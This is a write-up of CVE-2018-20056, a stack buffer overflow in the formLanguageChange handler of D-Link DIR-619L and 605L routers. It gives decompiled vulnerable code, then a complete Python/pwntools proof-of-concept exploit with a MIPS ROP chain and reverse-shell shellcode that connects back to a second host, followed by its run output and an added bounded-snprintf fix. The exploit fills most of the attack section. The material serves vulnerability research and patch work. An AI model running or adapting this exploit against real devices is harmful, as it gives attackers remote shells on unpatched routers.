(CVE-2018-20056) D-Link DIR-619L & 605L stack overflow vulnerability

1. Vulnerability overview

D-Link DIR-619L Rev.B devices before firmware 2.06B1 and DIR-605L Rev.B devices before 2.12B1 contain a buffer overflow in the formLanguageChange function of /bin/boa. The function calls sprintf without checking the length of its arguments, so a remote attacker who requests http://ip/goform/formLanguageChange with a crafted currTime parameter can achieve remote code execution.

Firmware download: ftp:/

2. Affected devices

D-Link DIR-619L Rev.B before 2.06B1 and DIR-605L Rev.B before 2.12B1.

3. Reproduction

Vulnerability analysis

In formLanguageChange, the parameters config.i18n.language, nextPage and currTime are fetched through websGetVar. websGetVar allocates a buffer with malloc, copies the parameter into it with memcpy and returns it to formLanguageChange. formLanguageChange then calls the dangerous function sprintf to write the parameter contents into the local variable local_f8, and in the next step passes local_f8 to websRedirect.

```c
void formLanguageChange(undefined4 uParm1)
{
  int iVar1;
  char *pcVar2;
  undefined4 uVar3;
  FILE *_stream;
  char *_si;
  char local_f8 [200];
  char acStack48 [24];
  undefined4 local_18;
  int local_14;

  _si = (char *)websGetVar(uParm1, "config.i18n.language", &DAT_004ac874);
  apmib_set(0x129, &local_18);
  _si = (char *)websGetVar(uParm1, "nextPage", &DAT_004ac874);
  if (*_si == 0) {
    uVar3 = websGetVar(uParm1, "currTime", &DAT_004ac874);   /* fetch the currTime parameter */
  }
  else {
    _si = "/index.asp";
  }
  sprintf(local_f8, "%s?t=%s", _si, uVar3);   /* dangerous: sprintf copies the strings with no length check */
LAB_00460b34:
  websRedirect(uParm1, local_f8);
  return;
}
```

websRedirect mainly calls send_r_moved_perm, which calls the dangerous function sprintf twice, writing into acStack224 (sp+0x19f8-0xe0) and acStack480 (sp+0x19f8-0x1e0) respectively.

```c
undefined4 websRedirect(int iParm1, char *pcParm2)
{
  char *pcVar1;

  *(undefined4 *)(iParm1 + 0x50) = 0;
  pcVar1 = strstr(pcParm2, "apply_setting.asp");
  if (pcVar1 != (char *)0x0) {
    apply_setting_redirect = apply_setting_redirect + 1;
  }
  send_r_moved_perm(iParm1, pcParm2);
  return 0;
}

void send_r_moved_perm(int iParm1, char *pcParm2)
{
  undefined4 uVar1;
  char *pcVar2;
  undefined auStack6624 [6144];
  char acStack480 [256];
  char acStack224 [200];

  ...
  if (pcVar2 == (char *)0x0) {
    if (*pcParm2 == '/') {
      pcParm2 = pcParm2 + 1;
    }
    sprintf(acStack224, "http://%s%s", *(undefined4 *)(iParm1 + 0x70), pcParm2);
    pcParm2 = acStack224;
  }
  /* the HTML tags that wrap the %s link in this format string did not survive extraction */
  sprintf(acStack480,
          "\r\n\t\tThis document has moved to a new location.\r\n\t\tPlease update your documents to reflect the new location.\r\n\t\t\r\n",
          pcParm2);
  ...
  return;
}
```

The second sprintf overwrites the return address; a ROP chain placed behind it hijacks the program's control flow. (The two sprintf calls can also be combined to pivot the stack, which is how the vulnerability's discoverer did it.)

Reproduction

PoC (a Python 2 / pwntools script, as published in the writeup):

```python
import requests
import sys
import struct
from pwn import *

# context.log_level = 'debug'
context.arch = 'mips'
context.endian = 'big'
ip = '192.168.75.150'

def syscmd1(a):
    p = remote(ip, 80)
    z = len(a)
    print '[+] len: ' + str(z)
    payload = ''
    payload += 'POST /goform/formLanguageChange HTTP/1.1\r\n'
    payload += 'Host: ' + ip + '\r\n'
    payload += 'Connection: keep-alive\r\n'
    payload += 'Accept-Encoding: gzip, deflate\r\n'
    payload += 'Accept: */*\r\n'
    payload += 'User-Agent: python-requests/2.18.4\r\n'
    payload += 'Content-Length: ' + str(z + 9) + '\r\n'
    payload += 'Content-Type: application/x-www-form-urlencoded\r\n'
    payload += '\r\n'
    payload += 'currTime='
    payload += a + '\r\n'
    p.send(payload)
    p.recvuntil('')
    # raw_input()
    p.close()

# base address of libc.so.0
base1 = 0x2ab88000

# shellcode
sc = struct.pack('>I', 0x24060101)
sc += struct.pack('>I', 0x04d0ffff)
sc += struct.pack('>I', 0x2806ffff)
sc += struct.pack('>I', 0x27bdffe)
sc += struct.pack('>I', 0x27e41001)
sc += struct.pack('>I', 0x2484f023)
sc += struct.pack('>I', 0xafa4ffe8)
sc += struct.pack('>I', 0xafa0ffec)
sc += struct.pack('>I', 0x27a5ffe8)
sc += struct.pack('>I', 0x24020fab)
sc += struct.pack('>I', 0xafa00108)
sc += struct.pack('>I', 0x0101010c)
sc += '/bin/sh\x00'
shellcode = ''
shellcode += asm(shellcraft.connect('192.168.75.149', 5555))
shellcode += asm(shellcraft.dup2(5, 0))
shellcode += asm(shellcraft.dup2(5, 1))
shellcode += sc

s0 = struct.pack('>I', base1 + 0x2C794)
s1 = struct.pack('>I', base1 + 0x2C794)
# rop2: move $t9, $s2; jr $t9
s2 = struct.pack('>I', base1 + 0x24b70)
# rop3: sleep(1)
s3 = struct.pack('>I', base1 + 0x2bdac)
# rop5: addiu $a0, $sp, 0x18; ...; lw $ra, 0x30; jr $ra
s4 = struct.pack('>I', base1 + 0x2bdac)

# rop
payload1 = 'a' * 0x167 + s0 + s1 + s2 + s3
payload1 += struct.pack('>I', base1 + 0x25714)   # rop1: li $a0, 1; move $t9, $s1; jalr $t9; ori $a1, $s0, 2
payload1 += 'b' * 0x1c + s0 + s1 + s2 + s3 + s4
payload1 += struct.pack('>I', base1 + 0x5f98)    # rop4: lw $ra, 0x1c($sp); ...; jr $ra
payload1 += 'c' * 0x1c
payload1 += s3
payload1 += 'd' * 0x18
payload1 += struct.pack('>I', 0x24910101)        # rop7: addiu $s1, $a0, 257; addi -257; move $t9, $s1; jalr $t9
payload1 += struct.pack('>I', 0x2231feff)
payload1 += struct.pack('>I', 0x0220c821)
payload1 += struct.pack('>I', 0x0320f809)
payload1 += struct.pack('>I', 0x2231feff)
payload1 += struct.pack('>I', 0x2231feff)
payload1 += struct.pack('>I', base1 + 0x2bda)    # rop6: mov $t9, $a0; ...; jalr $t9
payload1 += 'e' * 0x20 + shellcode

if __name__ == '__main__':
    syscmd1(payload1)
```

Result:

```
2018-2MS6S python DIR-619L.py
Opening connection to 192.168.75.150 on port 80: Done
len: 7441
Closed connection to 192.168.75.150 port 80
```
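The root cause is the unbounded sprintf into the 200-byte local_f8 buffer in formLanguageChange. As an added example (not code from the writeup or from the D-Link firmware), the C snippet below places the firmware's pattern next to a bounded version that checks the snprintf return value and refuses to emit a redirect that would not fit; the 200-byte size, the "%s?t=%s" format and the "/index.asp" default mirror the decompilation above, and all function names are assumed.

```c
#include <stdio.h>
#include <string.h>

#define REDIRECT_BUF 200   /* size of local_f8 in the decompiled formLanguageChange */

/* The firmware's pattern: sprintf with no bound. A currTime longer than the
 * remaining space overruns the stack frame. Kept only for comparison; the
 * demonstration never calls it with oversized input. */
static void build_redirect_unsafe(char *out, const char *next_page, const char *curr_time)
{
    sprintf(out, "%s?t=%s", next_page, curr_time);
}

/* Hardened form: snprintf writes at most out_len bytes, and its return value
 * (the length the untruncated string would have) reveals truncation.
 * Returns 0 on success, -1 when the redirect target does not fit. */
static int build_redirect_safe(char *out, size_t out_len,
                               const char *next_page, const char *curr_time)
{
    if (next_page == NULL || *next_page == '\0')
        next_page = "/index.asp";            /* same default as the firmware */
    if (curr_time == NULL)
        curr_time = "";
    int n = snprintf(out, out_len, "%s?t=%s", next_page, curr_time);
    if (n < 0 || (size_t)n >= out_len) {
        out[0] = '\0';                       /* never hand a truncated target to the redirect */
        return -1;
    }
    return 0;
}

/* Demonstration helper: 1 if the safe builder accepts the inputs and produces
 * exactly `expected`, 0 otherwise. */
static int safe_build_equals(const char *next_page, const char *curr_time, const char *expected)
{
    char out[REDIRECT_BUF];
    if (build_redirect_safe(out, sizeof out, next_page, curr_time) != 0)
        return 0;
    return strcmp(out, expected) == 0;
}

/* Demonstration helper: 1 if a constructed currTime of curr_len 'A' bytes is
 * rejected by the safe builder (13 bytes of "/index.asp?t=" precede it). */
static int rejects_curr_time_of_len(size_t curr_len)
{
    char curr[1024];
    char out[REDIRECT_BUF];
    if (curr_len >= sizeof curr)
        curr_len = sizeof curr - 1;
    memset(curr, 'A', curr_len);             /* constructed oversized parameter */
    curr[curr_len] = '\0';
    return build_redirect_safe(out, sizeof out, "/index.asp", curr) != 0;
}
```

Any value of curr_len from 187 upward is rejected, because the 13-byte prefix plus the parameter plus the terminating NUL no longer fits in 200 bytes.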